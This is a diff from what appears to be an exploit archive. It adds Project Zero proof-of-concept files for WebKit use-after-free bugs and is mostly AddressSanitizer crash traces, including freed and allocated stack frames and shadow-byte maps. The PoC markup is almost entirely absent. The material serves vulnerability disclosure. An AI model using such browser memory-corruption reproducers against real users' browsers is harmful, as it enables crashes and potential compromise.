int, WebCore::TextFieldSelectionDirection, WebCore::AXTextStateChangeIntent const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe4a152) + #13 0x111d43d86 in WebCore::HTMLTextFormControlElement::setSelectionDirection(WTF::String const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe49d86) + #14 0x111c8ff81 in WebCore::HTMLInputElement::setSelectionDirectionForBindings(WTF::String const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd95f81) + #15 0x1126f30fe in WebCore::setJSHTMLInputElementSelectionDirectionSetter(JSC::ExecState&, WebCore::JSHTMLInputElement&, JSC::JSValue, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x17f90fe) + #16 0x1126ea167 in bool WebCore::IDLAttribute::set<&(WebCore::setJSHTMLInputElementSelectionDirectionSetter(JSC::ExecState&, WebCore::JSHTMLInputElement&, JSC::JSValue, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState&, long long, long long, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x17f0167) + #17 0x11cd05e48 in JSC::callCustomSetter(JSC::ExecState*, bool (*)(JSC::ExecState*, long long, long long), bool, JSC::JSValue, JSC::JSValue) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x9aee48) + #18 0x11cd05f77 in JSC::callCustomSetter(JSC::ExecState*, JSC::JSValue, bool, JSC::JSObject*, JSC::JSValue, JSC::JSValue) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x9aef77) + #19 0x11d80a008 in JSC::JSObject::putInlineSlow(JSC::ExecState*, JSC::PropertyName, JSC::JSValue, JSC::PutPropertySlot&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x14b3008) + #20 0x11d9e0655 in llint_slow_path_put_by_id (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1689655) + #21 0x11d9fe4f4 in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16a74f4) + #22 0x11da01e49 in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16aae49) + #23 0x11d9faf6f in vmEntryToJavaScript (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16a3f6f) + #24 0x11d65e847 in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1307847) + #25 0x11d5df88a in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x128888a) + #26 0x11cbf8731 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a1731) + #27 0x11cbf89a2 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a19a2) + #28 0x11cbf8d13 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a1d13) + #29 0x112138615 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x123e615) + #30 0x11254b6cd in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext&, WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x16516cd) + #31 0x1118b7010 in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9bd010) + #32 0x1118b6ae0 in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9bcae0) + #33 0x111794051 in WebCore::DOMWindow::dispatchEvent(WebCore::Event&, WebCore::EventTarget*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x89a051) + #34 0x1117a3c0f in WebCore::DOMWindow::dispatchLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x8a9c0f) + #35 0x111696b0f in WebCore::Document::dispatchWindowLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x79cb0f) + #36 0x111690bad in WebCore::Document::implicitClose() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x796bad) + #37 0x111a433ed in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb493ed) + #38 0x111a4075c in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb4675c) + #39 0x1116b0523 in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7b6523) + #40 0x111c345d0 in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd3a5d0) + #41 0x111751693 in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x857693) + #42 0x111712736 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x818736) + #43 0x11118e047 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x294047) + #44 0x111186df1 in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28cdf1) + #45 0x113c5e661 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d64661) + #46 0x107c4643b in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xb1343b) + #47 0x107c496d9 in void IPC::handleMessage(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xb166d9) + #48 0x107c48bc9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xb15bc9) + #49 0x10743a117 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x307117) + #50 0x107219695 in IPC::Connection::dispatchMessage(std::__1::unique_ptr >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xe6695) + #51 0x107222a48 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xefa48) + #52 0x11e079842 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d22842) + #53 0x11e07a1b1 in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d231b1) + #54 0x7fffd52af320 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa7320) + #55 0x7fffd529021c in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8821c) + #56 0x7fffd528f715 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x87715) + #57 0x7fffd528f113 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x87113) + #58 0x7fffd47efebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb) + #59 0x7fffd47efcf0 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0) + #60 0x7fffd47efb25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25) + #61 0x7fffd2d88a53 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x46a53) + #62 0x7fffd35047ed in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7c27ed) + #63 0x7fffd2d7d3da in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x3b3da) + #64 0x7fffd2d47e0d in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x5e0d) + #65 0x7fffeac688c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x108c6) + #66 0x7fffeac672e3 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf2e3) + #67 0x10712056c in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x10000156c) + #68 0x7fffeaa0f234 in start (/usr/lib/system/libdyld.dylib:x86_64+0x5234) + +0x60800005dca8 is located 8 bytes inside of 88-byte region [0x60800005dca0,0x60800005dcf8) +freed by thread T0 here: + #0 0x10a37e294 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x57294) + #1 0x11e0c9650 in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d72650) + #2 0x111c873a8 in WebCore::HTMLInputElement::updateType() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd8d3a8) + #3 0x111c887b5 in WebCore::HTMLInputElement::parseAttribute(WebCore::QualifiedName const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd8e7b5) + #4 0x111847538 in WebCore::Element::attributeChanged(WebCore::QualifiedName const&, WTF::AtomicString const&, WTF::AtomicString const&, WebCore::Element::AttributeModificationReason) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x94d538) + #5 0x111855711 in WebCore::Element::didModifyAttribute(WebCore::QualifiedName const&, WTF::AtomicString const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x95b711) + #6 0x111846fef in WebCore::Element::setAttributeInternal(unsigned int, WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x94cfef) + #7 0x1126f1366 in WebCore::setJSHTMLInputElementTypeSetter(JSC::ExecState&, WebCore::JSHTMLInputElement&, JSC::JSValue, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x17f7366) + #8 0x1126e7e57 in bool WebCore::IDLAttribute::set<&(WebCore::setJSHTMLInputElementTypeSetter(JSC::ExecState&, WebCore::JSHTMLInputElement&, JSC::JSValue, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState&, long long, long long, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x17ede57) + #9 0x11cd05e48 in JSC::callCustomSetter(JSC::ExecState*, bool (*)(JSC::ExecState*, long long, long long), bool, JSC::JSValue, JSC::JSValue) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x9aee48) + #10 0x11cd05f77 in JSC::callCustomSetter(JSC::ExecState*, JSC::JSValue, bool, JSC::JSObject*, JSC::JSValue, JSC::JSValue) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x9aef77) + #11 0x11d80a008 in JSC::JSObject::putInlineSlow(JSC::ExecState*, JSC::PropertyName, JSC::JSValue, JSC::PutPropertySlot&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x14b3008) + #12 0x11d9e0655 in llint_slow_path_put_by_id (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1689655) + #13 0x11d9fe4f4 in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16a74f4) + #14 0x11da01dd7 in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16aadd7) + #15 0x11d9faf6f in vmEntryToJavaScript (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16a3f6f) + #16 0x11d65e847 in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1307847) + #17 0x11d5df88a in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x128888a) + #18 0x11cbf8731 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a1731) + #19 0x11cbf89a2 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a19a2) + #20 0x11cbf8d13 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a1d13) + #21 0x112138615 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x123e615) + #22 0x11254b6cd in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext&, WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x16516cd) + #23 0x1118b7010 in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9bd010) + #24 0x1118b6ae0 in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9bcae0) + #25 0x11187eb97 in WebCore::EventContext::handleLocalEvents(WebCore::Event&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x984b97) + #26 0x11187ef3e in WebCore::MouseOrFocusEventContext::handleLocalEvents(WebCore::Event&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x984f3e) + #27 0x11187fb2f in WebCore::dispatchEventInDOM(WebCore::Event&, WebCore::EventPath const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x985b2f) + #28 0x11187f553 in WebCore::EventDispatcher::dispatchEvent(WebCore::Node&, WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x985553) + #29 0x11184fe15 in WebCore::Element::dispatchFocusEvent(WTF::RefPtr&&, WebCore::FocusDirection) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x955e15) + +previously allocated by thread T0 here: + #0 0x10a37dd2c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x56d2c) + #1 0x7fffeab91281 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2281) + #2 0x11e0c9ad4 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d72ad4) + #3 0x11e0c7d6d in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d70d6d) + #4 0x11e04e247 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1cf7247) + #5 0x11e04d63a in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1cf663a) + #6 0x111f09398 in WebCore::InputType::operator new(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x100f398) + #7 0x111f09059 in std::__1::unique_ptr > WebCore::createInputType(WebCore::HTMLInputElement&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x100f059) + #8 0x111f03bbb in WebCore::InputType::create(WebCore::HTMLInputElement&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1009bbb) + #9 0x111c89e0a in WebCore::HTMLInputElement::initializeInputType() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd8fe0a) + #10 0x1118488aa in WebCore::Element::parserSetAttributes(WTF::Vector const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x94e8aa) + #11 0x111c09da3 in WebCore::HTMLConstructionSite::createHTMLElementOrFindCustomElementInterface(WebCore::AtomicHTMLToken&, WebCore::JSCustomElementInterface**) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd0fda3) + #12 0x111c08ff7 in WebCore::HTMLConstructionSite::createHTMLElement(WebCore::AtomicHTMLToken&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd0eff7) + #13 0x111c0a413 in WebCore::HTMLConstructionSite::insertSelfClosingHTMLElement(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd10413) + #14 0x111d724eb in WebCore::HTMLTreeBuilder::processStartTagForInBody(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe784eb) + #15 0x111d6ef13 in WebCore::HTMLTreeBuilder::processStartTag(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe74f13) + #16 0x111d6cd0e in WebCore::HTMLTreeBuilder::constructTree(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe72d0e) + #17 0x111c35c8a in WebCore::HTMLDocumentParser::constructTreeFromHTMLToken(WebCore::HTMLTokenizer::TokenPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd3bc8a) + #18 0x111c35849 in WebCore::HTMLDocumentParser::pumpTokenizerLoop(WebCore::HTMLDocumentParser::SynchronousMode, bool, WebCore::PumpSession&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd3b849) + #19 0x111c349c2 in WebCore::HTMLDocumentParser::pumpTokenizer(WebCore::HTMLDocumentParser::SynchronousMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd3a9c2) + #20 0x111c364e8 in WebCore::HTMLDocumentParser::append(WTF::RefPtr&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd3c4e8) + #21 0x111614531 in WebCore::DecodedDataDocumentParser::flush(WebCore::DocumentWriter&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x71a531) + #22 0x11175163d in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x85763d) + #23 0x111712736 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x818736) + #24 0x11118e047 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x294047) + #25 0x111186df1 in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28cdf1) + #26 0x113c5e661 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d64661) + #27 0x107c4643b in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xb1343b) + #28 0x107c496d9 in void IPC::handleMessage(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xb166d9) + #29 0x107c48bc9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xb15bc9) + +SUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x20654a) in WebCore::InputType::element() const +Shadow bytes around the buggy address: + 0x1c100000bb40: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa + 0x1c100000bb50: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa + 0x1c100000bb60: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa + 0x1c100000bb70: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00 + 0x1c100000bb80: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00 +=>0x1c100000bb90: fa fa fa fa fd[fd]fd fd fd fd fd fd fd fd fd fa + 0x1c100000bba0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00 + 0x1c100000bbb0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00 + 0x1c100000bbc0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00 + 0x1c100000bbd0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa + 0x1c100000bbe0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb +==29682==ABORTING +*/ \ No newline at end of file diff --git a/platforms/multiple/dos/43168.js b/platforms/multiple/dos/43168.js new file mode 100644 index 000000000..fd4abfd5b --- /dev/null +++ b/platforms/multiple/dos/43168.js @@ -0,0 +1,218 @@ +/* +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1346 + +There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly. + +PoC: + +================================================================= +*/ + + + + + + + +
+ +
+
+ + + + + + +/* +================================================================= + +ASan log: + +================================================================= +==29700==ERROR: AddressSanitizer: heap-use-after-free on address 0x607000149b24 at pc 0x00010fbb202a bp 0x7fff5f325d30 sp 0x7fff5f325d28 +READ of size 4 at 0x607000149b24 thread T0 +==29700==WARNING: invalid path to external symbolizer! +==29700==WARNING: Failed to use and restart external symbolizer! + #0 0x10fbb2029 in WebCore::Node::getFlag(WebCore::Node::NodeFlags) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xa029) + #1 0x10fbbca5d in WebCore::Node::firstChild() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x14a5d) + #2 0x10fcc7f58 in WebCore::Node::hasChildNodes() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x11ff58) + #3 0x112068f8d in WebCore::PositionIterator::decrement() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x24c0f8d) + #4 0x110492193 in WebCore::previousCandidate(WebCore::Position const&) 